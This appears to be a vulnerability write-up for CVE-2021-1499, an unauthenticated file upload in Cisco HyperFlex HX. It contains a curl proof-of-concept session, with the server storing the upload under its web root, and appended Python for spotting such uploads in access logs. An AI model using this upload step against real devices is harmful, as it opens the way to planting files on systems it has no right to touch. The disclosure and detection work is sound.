# Cisco HyperFlex HX arbitrary file upload (CVE-2021-1499)

A vulnerability in the web-based management interface of the Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. The curl session below shows an unauthenticated multipart POST to `/upload` being accepted with `200 OK`, and the JSON response reporting the path under the web root where the server stored the file:

```
wvu@kharak:~$ curl -v http://192.168.123.133/upload -F x=@/dev/null
*   Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /upload HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Transfer-Encoding: chunked
> Content-Type: multipart/form-data; boundary=————————1b9a7fe625152b78
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* Signaling end of chunked upload via terminating chunk.
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 01:10:59 GMT
< Content-Type: application/json;charset=ISO-8859-1
< Content-Length: 56
< Connection: keep-alive
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
{"result": "filename: /var/www/localhost/images//null"}
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$
```

References:

* https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
* https://attackerkb.com/topics/Z2MeUsvSlT/cve-2021-1499
* https://nvd.nist.gov/vuln/detail/CVE-2021-1499
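As an added example (not part of the original post or of Cisco's code), a small Python helper for hunting this behaviour after the fact: it extracts the stored path from the `{"result": "filename: ..."}` body shown above and flags successful POSTs to `/upload` in access logs, optionally correlated with a later fetch from the images directory. The nginx combined log format and the sample lines are assumptions, constructed to match the session above.

```python
import json
import re
from typing import List, Optional, Tuple

# Assumed nginx "combined" access-log format; the post only shows the curl
# exchange, so check the field order against the appliance's real logs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_hits(lines: List[str], endpoint: str = "/upload") -> List[Tuple[str, str, str]]:
    """Return (source, timestamp, path) for POSTs to the upload endpoint that the
    server answered 200; rejected attempts (401/403) store nothing and are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?", 1)[0] != endpoint:
            continue
        if int(m["status"]) == 200:
            hits.append((m["src"], m["ts"], m["path"]))
    return hits

def followed_by_fetch(lines: List[str], hits, prefix: str = "/images/") -> List[str]:
    """Sources that uploaded and also requested something under the directory the
    server reported as the upload location (a stronger signal than the POST alone)."""
    fetched = {m["src"] for m in map(LOG_RE.match, lines)
               if m and m["method"] == "GET" and m["path"].startswith(prefix)}
    return sorted({src for src, _, _ in hits if src in fetched})

def stored_path(body: str) -> Optional[str]:
    """Pull the server-side path out of the JSON body the endpoint returns
    (the {"result": "filename: ..."} shape seen in the curl output above)."""
    try:
        result = json.loads(body).get("result", "")
    except (ValueError, AttributeError):
        return None
    m = re.match(r"filename:\s*(\S+)", str(result))
    return m.group(1) if m else None

# Constructed sample lines modelled on the session above (not real appliance logs).
SAMPLE_LOG = [
    '192.168.123.1 - - [18/May/2021:01:10:59 +0000] "POST /upload HTTP/1.1" 200 56 "-" "curl/7.64.1"',
    '192.168.123.1 - - [18/May/2021:01:11:03 +0000] "GET /images/null HTTP/1.1" 200 0 "-" "curl/7.64.1"',
    '192.168.123.5 - - [18/May/2021:01:12:00 +0000] "POST /upload HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]
SAMPLE_BODY = '{"result": "filename: /var/www/localhost/images//null"}'
```

On a patched device the unauthenticated POST should no longer return 200 with a `filename:` result, so `stored_path` returning `None` for the response body is the expected post-fix outcome.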
